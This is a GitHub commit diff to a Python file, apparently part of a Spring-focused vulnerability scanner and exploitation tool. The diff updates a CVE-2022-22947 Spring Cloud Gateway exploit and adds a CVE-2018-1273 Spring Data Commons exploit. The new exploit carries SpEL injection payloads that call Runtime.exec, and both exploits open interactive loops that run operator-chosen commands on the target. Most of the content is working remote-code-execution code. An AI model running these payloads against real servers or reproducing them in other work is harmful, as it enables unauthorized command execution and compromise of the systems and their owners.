Skip to content

Commit 2717d08

Browse files
AabyssZGAabyssZG
authored
Update vul.py
1 parent 4fe8b2d commit 2717d08

File tree

1 file changed

+58
-9
lines changed

1 file changed

+58
-9
lines changed

inc/vul.py

Lines changed: 58 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,8 @@
11
#!/usr/bin/env python
22
# coding=utf-8
3+
################
4+
# AabyssZG #
5+
################
36

47
import requests, sys, json, re, random, base64
58
from termcolor import cprint
@@ -135,9 +138,9 @@ def CVE_2022_22947(url, proxies):
135138

136139
try:
137140
requests.packages.urllib3.disable_warnings()
138-
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json ,verify=False, proxies=proxies)
139-
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
140-
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
141+
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
142+
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
143+
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
141144
if ('uid=' in str(re3.text)) and ('gid=' in str(re3.text)) and ('groups=' in str(re3.text)):
142145
cprint("[+] Payload已经输出,回显结果如下:", "red")
143146
print('\n')
@@ -147,14 +150,14 @@ def CVE_2022_22947(url, proxies):
147150
while 1:
148151
Cmd = input("[+] 请输入要执行的命令>>> ")
149152
if Cmd == "exit":
150-
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
151-
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
153+
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
154+
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
152155
sys.exit(0)
153156
else:
154157
payload3 = payload2.replace('whoami', Cmd)
155-
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload3, headers=headers1, json=json ,verify=False, proxies=proxies)
156-
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
157-
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
158+
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload3, headers=headers1, timeout=10, json=json ,verify=False, proxies=proxies)
159+
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
160+
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
158161
result = re3.text
159162
cprint(result ,"green")
160163
print('\n')
@@ -356,6 +359,51 @@ def Eureka_xstream_RCE(url,proxies):
356359
f2.write(str(e) + '\n')
357360
f2.close()
358361

362+
def CVE_2018_1273(url,proxies):
363+
cprint("======开始对目标URL进行Spring_Data_Commons远程命令执行漏洞测试======","green")
364+
Headers = {
365+
"User-Agent": random.choice(ua),
366+
"Content-Type": "application/x-www-form-urlencoded"
367+
}
368+
path1 = 'users'
369+
path2 = 'users?page=0&size=5'
370+
payload1 = "username[#this.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\")]=chybeta&password=chybeta&repeatedPassword=chybeta"
371+
payload2 = "username[#this.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('whoami')\")]=asdf"
372+
try:
373+
requests.packages.urllib3.disable_warnings()
374+
urltest1 = url + path1
375+
urltest2 = url + path2
376+
re1 = requests.get(url=urltest1, headers=Headers, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
377+
code1 = re1.status_code
378+
if ((int(code1) == 200) and ('Users' in str(re1.text))):
379+
cprint("[+] 发现Spring_Data_Commons远程命令执行漏洞:", "red")
380+
cprint('漏洞存在路径为 ' + urltest1 + '\n', "red")
381+
print("[+] 执行命令模块(输入exit退出)")
382+
choose = input("[+] 总共有两种Payload,请输入1或者2>>> ")
383+
while 1:
384+
Cmd = input("[+] 请输入要执行的命令>>> ")
385+
if (choose == '1'):
386+
payload3 = payload1.replace('whoami', Cmd)
387+
else:
388+
payload3 = payload2.replace('whoami', Cmd)
389+
if Cmd == "exit":
390+
sys.exit(0)
391+
else:
392+
re2 = requests.post(url=urltest2, data=payload3, headers=Headers, timeout=10, verify=False, proxies=proxies)
393+
code2 = re2.status_code
394+
if (int(code2) != 503):
395+
cprint('[+] 该Payload已经打出,由于该漏洞无回显,请用Dnslog进行测试\n', "red")
396+
else:
397+
cprint("[-] 未发现Spring_Data_Commons远程命令执行漏洞\n", "yellow")
398+
except KeyboardInterrupt:
399+
print("Ctrl + C 手动终止了进程")
400+
sys.exit()
401+
except Exception as e:
402+
print("[-] 发生错误,已记入日志error.log\n")
403+
f2 = open("error.log", "a")
404+
f2.write(str(e) + '\n')
405+
f2.close()
406+
359407
def vul(url,proxies):
360408
functions = {
361409
1: CVE_2021_21234,
@@ -366,14 +414,15 @@ def vul(url,proxies):
366414
6: JolokiaRCE,
367415
7: JeeSpring_2023,
368416
8: Eureka_xstream_RCE,
417+
9: CVE_2018_1273,
369418
}
370419
cprint("[+] 目前漏洞库内容如下:","green")
371420
for num, func in functions.items():
372421
print(f" {num}: {func.__name__}")
373422
try:
374423
choices = input("\n请输入要检测的漏洞 (例子:1,3,5 直接回车即检测全部漏洞): ")
375424
if choices == '':
376-
choices = "1,2,3,4,5,6,7,8"
425+
choices = "1,2,3,4,5,6,7,8,9"
377426
choices = [int(choice) for choice in choices.split(',')]
378427
except Exception as e:
379428
print("请不要输入无意义的字符串")

0 commit comments

Comments
 (0)